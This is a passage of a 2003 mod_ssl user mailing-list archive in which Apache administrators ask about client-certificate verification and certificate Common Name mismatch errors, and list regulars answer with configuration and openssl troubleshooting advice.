References: <200301271401.59656.aputnam@pelathe.org>
Subject: Error on expired date of cert
Date: Tue, 28 Jan 2003 21:22:36 +0200
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Oleg Lyebyedyev" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,

I have following option:
SSLVerifyClient optional

(optional_no_ca - same result)

My servlet analizes data from cert. With correct certs all is ok.
Somebody without cert also has access to my page and I know that he hasn't a
cert, but when expired cert is used then server error is occured.
What is problem? Can I create ssl configuration to give access for all certs
and to get cert info.

Thank You
Oleg Lebedev



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jan 28 21:57:22 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 5B3842AA0CF; Tue, 28 Jan 2003 21:57:22 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from toftum.dk (toftum.dk [193.88.12.46])
	by master.modssl.org (Postfix) with ESMTP id E89802AA0B7
	for ; Tue, 28 Jan 2003 21:57:18 +0100 (CET)
Received: by toftum.dk (Postfix, from userid 1001)
	id D096C6E4013; Tue, 28 Jan 2003 21:57:08 +0100 (CET)
Date: Tue, 28 Jan 2003 21:57:08 +0100
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: Error on expired date of cert
Message-ID: <20030128205708.GA9436@toftum.dk>
Mail-Followup-To: modssl-users@modssl.org
References: <200301271401.59656.aputnam@pelathe.org> <002b01c2c702$a383a190$99a8c4d9@homecomp>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <002b01c2c702$a383a190$99a8c4d9@homecomp>
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Tue, Jan 28, 2003 at 09:22:36PM +0200, Oleg Lyebyedyev wrote:
> Hello,
> 
> I have following option:
> SSLVerifyClient optional
> 
> (optional_no_ca - same result)
> 
> My servlet analizes data from cert. With correct certs all is ok.
> Somebody without cert also has access to my page and I know that he hasn't a
> cert, but when expired cert is used then server error is occured.
> What is problem? Can I create ssl configuration to give access for all certs
> and to get cert info.
> 
Currently that is not possible afaict.

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From i.gabrie@mis.gla.ac.uk  Wed Jan 29 10:05:14 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: from hillhead.cent.gla.ac.uk (hillhead.cent.gla.ac.uk [130.209.16.101])
	by master.modssl.org (Postfix) with ESMTP
	id DCF542AA0C3; Wed, 29 Jan 2003 10:05:12 +0100 (CET)
Received: from salyut.mis.gla.ac.uk ([130.209.102.11])
	by hillhead.cent.gla.ac.uk with esmtp (Exim 4.10)
	id 18do9c-0003At-00; Wed, 29 Jan 2003 09:05:08 +0000
Received: from ntw0029.mis.gla.ac.uk ([130.209.164.175])
	by salyut.mis.gla.ac.uk with esmtp (Exim 3.16 #2)
	id 18do7E-0000aX-00; Wed, 29 Jan 2003 09:02:40 +0000
Message-Id: <5.1.1.6.0.20030129090246.00a69188@salyut.mis.gla.ac.uk>
X-Sender: igabrie@salyut.mis.gla.ac.uk
X-Mailer: QUALCOMM Windows Eudora Version 5.1.1
Date: Wed, 29 Jan 2003 09:05:09 +0000
To: modssl-users@modssl.org, modssl-users-l@master.modssl.org
From: Inderjit S Gabrie 
Subject: ~ Error Help - CN in certificate not server name or identical
  to CA!? ~
Mime-Version: 1.0
Content-Type: multipart/alternative;
	boundary="=====================_173678786==.ALT"

--=====================_173678786==.ALT
Content-Type: text/plain; charset="us-ascii"; format=flowed



                         Hi all

I am new to the SSL environment, getting a following error, can someone 
tell me whats going on and how i can resolve this....thsnka in 
advance...(error output below...)



[Tue Jul 2 11:54:00 2002] [error] mod_ssl: SSL handshake failed (server 
name here:443, client 130.209.164.170) (OpenSSL library error follows)
[Tue Jul 2 11:54:00 2002] [error] OpenSSL: error:14094412:SSL 
routines:SSL3_REA
D_BYTES:sslv3 alert bad certificate [Hint: Subject CN in certificate not 
server
name or identical to CA!?]




*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~
                         Inderjit 
S Gabrie
University of Glasgow, Department of MIS,
Gilbert 
Scott Building, Glasgow G12 8QQ
Tel: 0141-330-3837 Fax: 0141-330-4953
E-mail: I.Gabrie@mis.gla.ac.uk
Web Url: http://www.mis.gla.ac.uk
*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*
       "The future is here, it's just not evenly distributed yet."

--=====================_173678786==.ALT
Content-Type: text/html; charset="us-ascii"





                        Hi
all


I am new to the SSL environment, getting a following error, can someone
tell me whats going on and how i can resolve this....thsnka in
advance...(error output below...)





[Tue Jul 2 11:54:00 2002] [error] mod_ssl: SSL handshake failed (server
name here:443, client 130.209.164.170) (OpenSSL library error follows)


[Tue Jul 2 11:54:00 2002] [error] OpenSSL: error:14094412:SSL
routines:SSL3_REA 

D_BYTES:sslv3 alert bad certificate [Hint: Subject CN in certificate not
server 

name or identical to CA!?]







*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~ 



                        Inderjit
S Gabrie 

University of Glasgow, Department
of MIS, 

Gilbert
Scott Building, Glasgow G12 8QQ 

Tel: 0141-330-3837 Fax: 0141-330-4953 

E-mail: I.Gabrie@mis.gla.ac.uk 

Web Url: http://www.mis.gla.ac.uk 

*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*

      "The future is here, it's just not evenly distributed yet."



--=====================_173678786==.ALT--


From owner-modssl-users@modssl.org  Wed Jan 29 10:19:25 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id A5ABE2AA0CF; Wed, 29 Jan 2003 10:19:25 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from ns0a.swx.com (ns0a.swx.com [146.109.240.107])
	by master.modssl.org (Postfix) with ESMTP id F20BE2AA0B7
	for ; Wed, 29 Jan 2003 10:19:23 +0100 (CET)
Received: from gate0b.unix.swx.ch (gate0b [192.168.252.145])
	by ns0a.swx.com (8.12.6/8.12.6) with ESMTP id h0T9JJlA027430
	for ; Wed, 29 Jan 2003 10:19:19 +0100 (MET)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0b.unix.swx.ch (8.12.6/8.12.6) with ESMTP id h0T9JH2M026902
	for ; Wed, 29 Jan 2003 10:19:18 +0100 (MET)
Content-Class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Subject: RE: ~ Error Help - CN in certificate not server name or identical  to CA!? ~
Date: Wed, 29 Jan 2003 10:19:17 +0100
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: ~ Error Help - CN in certificate not server name or identical  to CA!? ~
Importance: normal
thread-index: AcLHdbNMl+QoNHS5T9SUR0xQb23yLQAACNCw
From: "Boyle Owen" 
To: "mod_ssl list" 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Please post in plain-text... - 

Your error: "[Hint: Subject CN in certificate not server name or
identical to CA!?]"

means: the Common Name in the certificate is not the same as the
ServerName in the URL - e.g. the certificate belongs to www.abcdef.com
but you are using it in a server whose URL is www.uvwxyz.com. This makes
the browser think your site is impersonating another site and so throws
a warning.

Where did you get the cert? Is it self-signed? If so, make a new one
with the correct server name.

Rgds,

Owen Boyle

PS  How did you remove the "Reply-To" header which normally directs the
replies back to the list? This is supposed to be a public mailing list,
not your private resource. You are supposed to share the replies with
others and allow them to go in the archive. Anyway, I cahnged it back...


-----Original Message-----
From: Inderjit S Gabrie [mailto:i.gabrie@mis.gla.ac.uk]
Sent: Mittwoch, 29. Januar 2003 10:05
To: modssl-users@modssl.org; modssl-users-l@master.modssl.org
Subject: ~ Error Help - CN in certificate not server name or identical
to CA!? ~




                        Hi all

I am new to the SSL environment, getting a following error, can someone
tell me whats going on and how i can resolve this....thsnka in
advance...(error output below...)



[Tue Jul 2 11:54:00 2002] [error] mod_ssl: SSL handshake failed (server
name here:443, client 130.209.164.170) (OpenSSL library error follows) 
[Tue Jul 2 11:54:00 2002] [error] OpenSSL: error:14094412:SSL
routines:SSL3_REA 
D_BYTES:sslv3 alert bad certificate [Hint: Subject CN in certificate not
server 
name or identical to CA!?]




*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~ 
                        Inderjit S Gabrie 
University of Glasgow, Department of MIS, 
Gilbert Scott Building, Glasgow G12 8QQ 
Tel: 0141-330-3837 Fax: 0141-330-4953 
E-mail: I.Gabrie@mis.gla.ac.uk 
Web Url: http://www.mis.gla.ac.uk 
*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*
      "The future is here, it's just not evenly distributed yet."

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company. 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jan 29 11:00:16 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 152212AA0CF; Wed, 29 Jan 2003 11:00:16 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mailhub.fokus.gmd.de (mailhub.fokus.gmd.de [193.174.154.14])
	by master.modssl.org (Postfix) with ESMTP id 4A3702AA0B7
	for ; Wed, 29 Jan 2003 11:00:10 +0100 (CET)
Received: from fokus.fraunhofer.de (sol [193.174.154.20])
	by mailhub.fokus.gmd.de (8.11.6/8.11.6) with ESMTP id h0TA05i14779
	for ; Wed, 29 Jan 2003 11:00:05 +0100 (MET)
Message-ID: <3E37A625.30804@fokus.fraunhofer.de>
Date: Wed, 29 Jan 2003 11:00:05 +0100
From: Aihong Yin 
Organization: FOKUS
User-Agent: Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:0.9.4.1) Gecko/20020406 Netscape6/6.2.2
X-Accept-Language: en-us
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: [warn] RSA server certificate CommonName (CN) `yin.*' does NOT match server name!?
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Aihong Yin 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello all,

I am trying to setup my server (apache 2.0.43, opensl 0.9.6g on RedHat 
7.1).

I have created a SSL server certificate using a self-made CA, and am 
sure that
the Common Name in the Server Certificate und ServerName in http.conf 
file are
the same "yin.fokus.gmd.de", which is identical with the host address.

I now start apache with "apachect1 startssl"and get the following message
in error_log file, but no errors in the console
---->
[Wed Jan 29 08:34:02 2003] [warn] RSA server certificate CommonName (CN)
 `yin.fokus.gmd.de' does NOT match server name!?
[Wed Jan 29 08:34:03 2003] [notice] Digest: generating secret for digest 
authentication ...
[Wed Jan 29 08:34:03 2003] [notice] Digest: done
[Wed Jan 29 08:34:04 2003] [warn] RSA server certificate CommonName (CN)
`yin.fokus.gmd.de' does NOT match server name!?
[Wed Jan 29 08:34:05 2003] [notice] Apache/2.0.43 (Unix) mod_ssl/2.0.43 
OpenSSL/0.9.6g DAV/2 configured
-- resuming normal operations
<---

if I try and access the secure site (https://yin.fokus.gmd.de) I get the 
following error message in browser
 (but I can start the normal site http://yin.fokus.gmd.de):
------>
The server's certificate has an invalid signature. You will not be able 
to connect to this site securely.
<------

Thanks a lot for any helps.

Best Regards,
Aihong Yin.




-- 




 


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jan 29 11:15:21 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id AEC5F2AA0CF; Wed, 29 Jan 2003 11:15:21 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from ns0b.swx.com (ns0b.swx.com [146.109.240.235])
	by master.modssl.org (Postfix) with ESMTP id CAD0A2AA0B7
	for ; Wed, 29 Jan 2003 11:15:19 +0100 (CET)
Received: from gate0b.unix.swx.ch (gate0b [192.168.252.145])
	by ns0b.swx.com (8.12.6/8.12.6) with ESMTP id h0TAFFCl029003
	for ; Wed, 29 Jan 2003 11:15:15 +0100 (MET)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0b.unix.swx.ch (8.12.6/8.12.6) with ESMTP id h0TAFD2M029110
	for ; Wed, 29 Jan 2003 11:15:14 +0100 (MET)
Content-Class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Subject: RE: [warn] RSA server certificate CommonName (CN) `yin.*' does NOT match server name!?
Date: Wed, 29 Jan 2003 11:15:13 +0100
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: [warn] RSA server certificate CommonName (CN) `yin.*' does NOT match server name!?
Importance: normal
thread-index: AcLHfVjkaKMLwu+cQ7y+iqRFuZGqQAAADFZA
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

>-----Original Message-----
>From: Aihong Yin [mailto:yin@fokus.fraunhofer.de]
>Sent: Mittwoch, 29. Januar 2003 11:00
>To: modssl-users@modssl.org
>Subject: [warn] RSA server certificate CommonName (CN) `yin.*' does NOT
>match server name!?
>
>
>Hello all,
>
>I am trying to setup my server (apache 2.0.43, opensl 0.9.6g on RedHat 
>7.1).
>
>I have created a SSL server certificate using a self-made CA, and am 
>sure that
>the Common Name in the Server Certificate und ServerName in http.conf 
>file are
>the same "yin.fokus.gmd.de", which is identical with the host address.

Really? Are you sure you have the line:

	ServerName yin.fokus.gmd.de

in the SSL VH config?

If so, are you sure the certificate's common name is yin.fokus.gmd.de?
Don't just say "Yes", check it with:

	openssl x509 -subject -in /path/to/cert

then see what "CN=" is set to.

>
>I now start apache with "apachect1 startssl"and get the 
>following message
>in error_log file, but no errors in the console
>---->
>[Wed Jan 29 08:34:02 2003] [warn] RSA server certificate 
>CommonName (CN)
> `yin.fokus.gmd.de' does NOT match server name!?
>[Wed Jan 29 08:34:03 2003] [notice] Digest: generating secret 
>for digest 
>authentication ...
>[Wed Jan 29 08:34:03 2003] [notice] Digest: done
>[Wed Jan 29 08:34:04 2003] [warn] RSA server certificate 
>CommonName (CN)
>`yin.fokus.gmd.de' does NOT match server name!?
>[Wed Jan 29 08:34:05 2003] [notice] Apache/2.0.43 (Unix) 
>mod_ssl/2.0.43 
>OpenSSL/0.9.6g DAV/2 configured
>-- resuming normal operations
><---
>
>if I try and access the secure site (https://yin.fokus.gmd.de) 
>I get the 
>following error message in browser
> (but I can start the normal site http://yin.fokus.gmd.de):
>------>
>The server's certificate has an invalid signature. You will 
>not be able 
>to connect to this site securely.
><------

Your domain name is not in public DNS so I suppose you do this locally.
Anyway, I suppose it means that the browser cannot verify the
certificate authority who signed the cert. If it is self-signed, that is
hardly suprising. It should, however, allow you in if you just clikc
"OK" anyway.

Rgds,

Owen Boyle

>
>Thanks a lot for any helps.
>
>Best Regards,
>Aihong Yin.
>
>
>
>
>-- 
>
>
>
>
> 
>
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company. 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jan 29 11:19:16 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 2B1492AA0CF; Wed, 29 Jan 2003 11:19:16 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from toftum.dk (toftum.dk [193.88.12.46])
	by master.modssl.org (Postfix) with ESMTP id 8A4072AA0B7
	for ; Wed, 29 Jan 2003 11:19:08 +0100 (CET)
Received: by toftum.dk (Postfix, from userid 1001)
	id A0C636E4013; Wed, 29 Jan 2003 11:19:00 +0100 (CET)
Date: Wed, 29 Jan 2003 11:19:00 +0100
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: [warn] RSA server certificate CommonName (CN) `yin.*' does NOT match server name!?
Message-ID: <20030129101900.GA23746@toftum.dk>
Mail-Followup-To: modssl-users@modssl.org
References: <3E37A625.30804@fokus.fraunhofer.de>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <3E37A625.30804@fokus.fraunhofer.de>
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Wed, Jan 29, 2003 at 11:00:05AM +0100, Aihong Yin wrote:
> Hello all,
> 
> I am trying to setup my server (apache 2.0.43, opensl 0.9.6g on RedHat 
> 7.1).
> 
> I have created a SSL server certificate using a self-made CA, and am 
> sure that
> the Common Name in the Server Certificate und ServerName in http.conf 
> file are
> the same "yin.fokus.gmd.de", which is identical with the host address.
> 
>From the error message in the subject, it would appear that you have set CN to
yin.* and not yin.fokus.gmd.de. Use openssl to verify the problem:

openssl x509 -noout -text -in server.crt

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jan 29 12:07:13 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 8DE1F2AA0CF; Wed, 29 Jan 2003 12:07:13 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mailhub.fokus.gmd.de (mailhub.fokus.gmd.de [193.174.154.14])
	by master.modssl.org (Postfix) with ESMTP id 512B52AA0B7
	for ; Wed, 29 Jan 2003 12:07:06 +0100 (CET)
Received: from fokus.fraunhofer.de (sol [193.174.154.20])
	by mailhub.fokus.gmd.de (8.11.6/8.11.6) with ESMTP id h0TB71i22506
	for ; Wed, 29 Jan 2003 12:07:01 +0100 (MET)
Message-ID: <3E37B5D5.20201@fokus.fraunhofer.de>
Date: Wed, 29 Jan 2003 12:07:01 +0100
From: Aihong Yin 
Organization: FOKUS
User-Agent: Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:0.9.4.1) Gecko/20020406 Netscape6/6.2.2
X-Accept-Language: en-us
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: [warn] RSA server certificate CommonName (CN) `yin.fokus.gmd.de' does NOT match server name!?
References: 
Content-Type: multipart/alternative;
 boundary="------------050402040403090202090501"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Aihong Yin 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


--------------050402040403090202090501
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Hello Owen and Toftum,

thanks for your mail.

>>Hello all,
>>
>>I am trying to setup my server (apache 2.0.43, opensl 0.9.6g on RedHat 
>>7.1).
>>
>>I have created a SSL server certificate using a self-made CA, and am 
>>sure that
>>the Common Name in the Server Certificate und ServerName in http.conf 
>>file are
>>the same "yin.fokus.gmd.de", which is identical with the host address.
>>
>
>Really? Are you sure you have the line:
>
>	ServerName yin.fokus.gmd.de
>
>in the SSL VH config?
>
Do you mean that I should configure VirtualHost in the http.conf file? 
But I think the Virtual Host is used for the case
of more than one web site running on a single machine. Is this correct? 
On my Laptop there is only one web site "yin.fokus.gmd.de".
I now have tried to configure VirtualHost and it is the same error.

>If so, are you sure the certificate's common name is yin.fokus.gmd.de?
>Don't just say "Yes", check it with:
>
>	openssl x509 -subject -in /path/to/cert
>
>then see what "CN=" is set to.
>

I have checked it and They are the same ("CN=" is set to "yin.fokus.gmd.de).

>
>
>>I now start apache with "apachect1 startssl"and get the 
>>following message
>>in error_log file, but no errors in the console
>>---->
>>[Wed Jan 29 08:34:02 2003] [warn] RSA server certificate 
>>CommonName (CN)
>>`yin.fokus.gmd.de' does NOT match server name!?
>>[Wed Jan 29 08:34:03 2003] [notice] Digest: generating secret 
>>for digest 
>>authentication ...
>>[Wed Jan 29 08:34:03 2003] [notice] Digest: done
>>[Wed Jan 29 08:34:04 2003] [warn] RSA server certificate 
>>CommonName (CN)
>>`yin.fokus.gmd.de' does NOT match server name!?
>>[Wed Jan 29 08:34:05 2003] [notice] Apache/2.0.43 (Unix) 
>>mod_ssl/2.0.43 
>>OpenSSL/0.9.6g DAV/2 configured
>>-- resuming normal operations
>><---
>>
>>if I try and access the secure site (https://yin.fokus.gmd.de) 
>>I get the 
>>following error message in browser
>>(but I can start the normal site http://yin.fokus.gmd.de):
>>------>
>>The server's certificate has an invalid signature. You will 
>>not be able 
>>to connect to this site securely.
>><------
>>
>
>Your domain name is not in public DNS so I suppose you do this locally.
>
You are right. I try this on my laptop for our future projekt. Shoud I 
use the IP address and not host name in the server certificate?
but it is changed frequently.

Best Regards,

Aihong Yin.





 



--------------050402040403090202090501
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit





Hello Owen and Toftum,



thanks for your mail.





  

    
Hello all,

I am trying to setup my server (apache 2.0.43, opensl 0.9.6g on RedHat 
7.1).

I have created a SSL server certificate using a self-made CA, and am 
sure that
the Common Name in the Server Certificate und ServerName in http.conf 
file are
the same "yin.fokus.gmd.de", which is identical with the host address.

    

    

Really? Are you sure you have the line:

	ServerName yin.fokus.gmd.de

in the SSL VH config?

    

Do you mean that I should configure VirtualHost in the http.conf file? But
I think the Virtual Host is used for the case

of more than one web site running on a single machine. Is this correct? On
my Laptop there is only one web site "yin.fokus.gmd.de".

I now have tried to configure VirtualHost and it is the same error.

    

    

      
If so, are you sure the certificate's common name is yin.fokus.gmd.de?
Don't just say "Yes", check it with:

	openssl x509 -subject -in /path/to/cert

then see what "CN=" is set to.

      

      

I have checked it and They are the same ("CN=" is set to "yin.fokus.gmd.de).

      

      

        



        

          
I now start apache with "apachect1 startssl"and get the 
following message
in error_log file, but no errors in the console
---->
[Wed Jan 29 08:34:02 2003] [warn] RSA server certificate 
CommonName (CN)
`yin.fokus.gmd.de' does NOT match server name!?
[Wed Jan 29 08:34:03 2003] [notice] Digest: generating secret 
for digest 
authentication ...
[Wed Jan 29 08:34:03 2003] [notice] Digest: done
[Wed Jan 29 08:34:04 2003] [warn] RSA server certificate 
CommonName (CN)
`yin.fokus.gmd.de' does NOT match server name!?
[Wed Jan 29 08:34:05 2003] [notice] Apache/2.0.43 (Unix) 
mod_ssl/2.0.43 
OpenSSL/0.9.6g DAV/2 configured
-- resuming normal operations
<---

if I try and access the secure site (https://yin.fokus.gmd.de) 
I get the 
following error message in browser
(but I can start the normal site http://yin.fokus.gmd.de):
------>
The server's certificate has an invalid signature. You will 
not be able 
to connect to this site securely.
<------

          

          

Your domain name is not in public DNS so I suppose you do this locally.

          

You are right. I try this on my laptop for our future projekt. Shoud I use
the IP address and not host name in the server certificate?

but it is changed frequently. 

          

Best Regards,

          

Aihong Yin.

          

            




 


            

            
            

--------------050402040403090202090501--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jan 29 12:17:31 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 6F3122AA0CF; Wed, 29 Jan 2003 12:17:31 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from ns0b.swx.com (ns0b.swx.com [146.109.240.235])
	by master.modssl.org (Postfix) with ESMTP id C20802AA0B7
	for ; Wed, 29 Jan 2003 12:17:25 +0100 (CET)
Received: from gate0b.unix.swx.ch (gate0b [192.168.252.145])
	by ns0b.swx.com (8.12.6/8.12.6) with ESMTP id h0TBHJCl013571
	for ; Wed, 29 Jan 2003 12:17:19 +0100 (MET)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0b.unix.swx.ch (8.12.6/8.12.6) with ESMTP id h0TBHI2M001048
	for ; Wed, 29 Jan 2003 12:17:18 +0100 (MET)
Content-Class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Subject: RE: [warn] RSA server certificate CommonName (CN) `yin.fokus.gmd.de' does NOT match server name!?
Date: Wed, 29 Jan 2003 12:17:17 +0100
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: [warn] RSA server certificate CommonName (CN) `yin.fokus.gmd.de' does NOT match server name!?
Importance: normal
thread-index: AcLHhrSWf/bytIJPTA6hS1gOGU5NVAAAPwEw
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

PLease post in plain text - my mail client doesn't handle HTML mail...

The thing you type into the browser's Location window has to match
what's in the cert. Does it? If you are doing all this on a standalone
laptop, I doubt it.


-----Original Message-----
From: Aihong Yin [mailto:yin@fokus.fraunhofer.de]
Sent: Mittwoch, 29. Januar 2003 12:07
To: modssl-users@modssl.org
Subject: Re: [warn] RSA server certificate CommonName (CN)
`yin.fokus.gmd.de' does NOT match server name!?


Hello Owen and Toftum,

thanks for your mail.


Hello all,I am trying to setup my server (apache 2.0.43, opensl 0.9.6g
on RedHat 7.1).I have created a SSL server certificate using a self-made
CA, and am sure thatthe Common Name in the Server Certificate und
ServerName in http.conf file arethe same "yin.fokus.gmd.de", which is
identical with the host address.
Really? Are you sure you have the line:	ServerName yin.fokus.gmd.dein
the SSL VH config?
Do you mean that I should configure VirtualHost in the http.conf file?
But I think the Virtual Host is used for the case
of more than one web site running on a single machine. Is this correct?
On my Laptop there is only one web site "yin.fokus.gmd.de".
I now have tried to configure VirtualHost and it is the same error.


If so, are you sure the certificate's common name is
yin.fokus.gmd.de?Don't just say "Yes", check it with:	openssl x509
-subject -in /path/to/certthen see what "CN=" is set to.

I have checked it and They are the same ("CN=" is set to
"yin.fokus.gmd.de).



I now start apache with "apachect1 startssl"and get the following
messagein error_log file, but no errors in the console---->[Wed Jan 29
08:34:02 2003] [warn] RSA server certificate CommonName
(CN)`yin.fokus.gmd.de' does NOT match server name!?[Wed Jan 29 08:34:03
2003] [notice] Digest: generating secret for digest authentication
...[Wed Jan 29 08:34:03 2003] [notice] Digest: done[Wed Jan 29 08:34:04
2003] [warn] RSA server certificate CommonName (CN)`yin.fokus.gmd.de'
does NOT match server name!?[Wed Jan 29 08:34:05 2003] [notice]
